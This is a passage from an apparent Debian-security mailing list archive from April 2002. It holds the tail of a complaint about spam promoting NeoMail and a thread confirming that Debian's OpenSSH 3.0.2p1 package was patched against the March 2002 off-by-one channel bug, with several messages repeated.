> any case, I'm sorry that he got a bit overexcited, and I hope everyone
> understands I had nothing to do with it.
> 
> If you need anything further from me feel free to reply to this address.
> 
> Thanks!
> 
> Ernie Miller
> 
> 
> - Original Message -
> From: "Andrew Lau" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Cc: "Debian-Security List" <[EMAIL PROTECTED]>
> Sent: Friday, April 05, 2002 7:55 AM
> Subject: Re: NEOMAIL - as big kev in OZ would say, IM EXCITED !
> 
> Dear Ernie Miller,
>  I'm forwarding you this piece of spam that was recently sent
> to debian-security mailing list. It is also archived at
>  3.html>. Being
> unable to find a Marcel Welschbillig listed on your SourceForge
> project page, I have decided against forwarding this to SourceForge
> abuse staff in the present time seeing as I am unable to determine
> whether this spam was authourised or not by you anyone acting on
> behalf of the NeoMail project. However, this piece of spam has been
> previously listed on the Razor  webiste
> as spam which would leave me to believe that this is not a one-off
> incident. Please take action to stop further spam if you do know this
> person or else it unsolicted advertising promoting your project will
> only further damage your reputation among the opensource community.
> 
> Yours sincerely,
> Andrew "Netsnipe" Lau
> 
> - Forwarded message from Marcel Welschbillig
> <[EMAIL PROTECTED]> -
> 
> Received: from localhost ([127.0.0.1] ident=netsnipe)
>  by espresso with esmtp (Exim 3.35 #1 (Debian))
>  id 16tNxs-0001v9-00
>  for ; Fri, 05 Apr 2002 17:16:52 +1000
> Received: from pop3.iprimus.com.au [203.134.64.85]
>  by localhost with IMAP (fetchmail-5.9.11)
>  for netsnipe@localhost (single-drop); Fri, 05 Apr 2002 17:16:52 +1000 (EST)
> Received: from mx01.iprimus.com.au ([203.134.64.90]) by loc01.iprimus.com.au
> with Microsoft SMTPSVC(5.5.1877.647.64);
>   Fri, 5 Apr 2002 11:58:04 +1000
> Received: from murphy.debian.org ([65.125.64.134]) by mx01.iprimus.com.au
> with Microsoft SMTPSVC(5.0.2195.4617);
>   Fri, 5 Apr 2002 11:58:03 +1000
> Received: (qmail 15663 invoked by uid 38); 5 Apr 2002 01:56:55 -
> X-Envelope-Sender: [EMAIL PROTECTED]
> Received: (qmail 15618 invoked from network); 5 Apr 2002 01:56:52 -
> Received: from unknown (HELO vager2.comdek.net.au) ([EMAIL PROTECTED])
>   by murphy.debian.org with SMTP; 5 Apr 2002 01:56:52 -
> Received: from comdek.net.au (marcel@localhost [127.0.0.1])
>  by vager2.comdek.net.au (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id
> JAA03755
>  for <[EMAIL PROTECTED]>; Fri, 5 Apr 2002 09:42:12 +0800
> X-Authentication-Warning: vager2.comdek.net.au: Host marcel@localhost
> [127.0.0.1] claimed to be comdek.net.au
> Message-ID: <[EMAIL PROTECTED]>
> Date: Fri, 05 Apr 2002 09:42:11 +0800
> From: Marcel Welschbillig <[EMAIL PROTECTED]>
> User-Agent: Mozilla/5.0 (X11; U; Linux 2.4.4 i686; en-US; m18)
> Gecko/20001107 Netscape6/6.0
> X-Accept-Language: en
> MIME-Version: 1.0
> To: Debian-Security List <[EMAIL PROTECTED]>
> Subject: NEOMAIL - as big kev in OZ would say, IM EXCITED !
> Content-Type: text/plain; charset=us-ascii; format=flowed
> Content-Transfer

Re: OpenSSH 3.1

2002-04-07 Thread Noah L. Meyerhans 
On Sun, Apr 07, 2002 at 02:53:16PM +0200, Mark Janssen wrote:
> 
> Debian usually patches the (security) bug, without going straight to the
> new upstream release, but only upgrading the package number

That's only the case with stable.  In unstable, there is no reason not
to go straight to the new upstream version.  It is the package
maintainers decision how and when to do that, though.  I'm sure 3.1 will
be packaged before long.

noah

-- 
 ___
| Web: http://web.morgul.net/~frodo/
| PGP Public Key: http://web.morgul.net/~frodo/mail.html 


pgpUo8rPjcheS.pgp
Description: PGP signature

Re: OpenSSH 3.1

2002-04-07 Thread Noah L. Meyerhans 

On Sun, Apr 07, 2002 at 02:53:16PM +0200, Mark Janssen wrote:
> 
> Debian usually patches the (security) bug, without going straight to the
> new upstream release, but only upgrading the package number

That's only the case with stable.  In unstable, there is no reason not
to go straight to the new upstream version.  It is the package
maintainers decision how and when to do that, though.  I'm sure 3.1 will
be packaged before long.

noah

-- 
 ___
| Web: http://web.morgul.net/~frodo/
| PGP Public Key: http://web.morgul.net/~frodo/mail.html 



msg06251/pgp0.pgp
Description: PGP signature

Re: OpenSSH 3.1

2002-04-07 Thread Junichi Uekawa 
"Peter Lieven" <[EMAIL PROTECTED]> cum veritate scripsit:

> is the "OpenSSH_3.0.2p1" version avaiable in the testing/unstable tree 
> already patched
> against the "March 7, 2002: Off-by-one error in the channel code" security 
> hole?


yes.


-- 
[EMAIL PROTECTED] : Junichi Uekawa   http://www.netfort.gr.jp/~dancer
GPG Fingerprint : 17D6 120E 4455 1832 9423  7447 3059 BF92 CD37 56F4


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: OpenSSH 3.1

2002-04-07 Thread Mark Janssen 
On Sun, 2002-04-07 at 14:34, Peter Lieven wrote:
> Is there any reason why there is no OpenSSH 3.1 package for debian available 
> yet?
> is the "OpenSSH_3.0.2p1" version avaiable in the testing/unstable tree 
> already patched
> against the "March 7, 2002: Off-by-one error in the channel code" security 
> hole?

Yes, it was fixed in debian package Openssh_3.0.2p1-8 (maybe allready in
7, but that had other problems)

Debian usually patches the (security) bug, without going straight to the
new upstream release, but only upgrading the package number

-- 
Mark Janssen Unix / Linux, Open-Source and Internet Consultant @
SyConOS IT
E-mail: mark(at)markjanssen.nl / maniac(at)maniac.nl GnuPG Key Id:
357D2178
Web: Maniac.nl Unix-God.[Net|Org] MarkJanssen.[com|net|org|nl]
SyConOS.[com|nl]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

OpenSSH 3.1

2002-04-07 Thread Peter Lieven 



Is there any reason why there is no OpenSSH 3.1 
package for debian available yet?
is the "OpenSSH_3.0.2p1" version avaiable in the 
testing/unstable tree already patched
against the "March 7, 2002: Off-by-one error in the channel code" security 
hole?
 
thanks
Peter

Re: OpenSSH 3.1

2002-04-07 Thread Junichi Uekawa 

"Peter Lieven" <[EMAIL PROTECTED]> cum veritate scripsit:

> is the "OpenSSH_3.0.2p1" version avaiable in the testing/unstable tree already 
>patched
> against the "March 7, 2002: Off-by-one error in the channel code" security hole?


yes.


-- 
[EMAIL PROTECTED] : Junichi Uekawa   http://www.netfort.gr.jp/~dancer
GPG Fingerprint : 17D6 120E 4455 1832 9423  7447 3059 BF92 CD37 56F4


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: OpenSSH 3.1

2002-04-07 Thread Mark Janssen 

On Sun, 2002-04-07 at 14:34, Peter Lieven wrote:
> Is there any reason why there is no OpenSSH 3.1 package for debian available yet?
> is the "OpenSSH_3.0.2p1" version avaiable in the testing/unstable tree already 
>patched
> against the "March 7, 2002: Off-by-one error in the channel code" security hole?

Yes, it was fixed in debian package Openssh_3.0.2p1-8 (maybe allready in
7, but that had other problems)

Debian usually patches the (security) bug, without going straight to the
new upstream release, but only upgrading the package number

-- 
Mark Janssen Unix / Linux, Open-Source and Internet Consultant @
SyConOS IT
E-mail: mark(at)markjanssen.nl / maniac(at)maniac.nl GnuPG Key Id:
357D2178
Web: Maniac.nl Unix-God.[Net|Org] MarkJanssen.[com|net|org|nl]
SyConOS.[com|nl]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

OpenSSH 3.1

2002-04-07 Thread Peter Lieven 



Is there any reason why there is no OpenSSH 3.1 
package for debian available yet?
is the "OpenSSH_3.0.2p1" version avaiable in the 
testing/unstable tree already patched
against the "March 7, 2002: Off-by-one error in the channel code" security 
hole?
 
thanks
Peter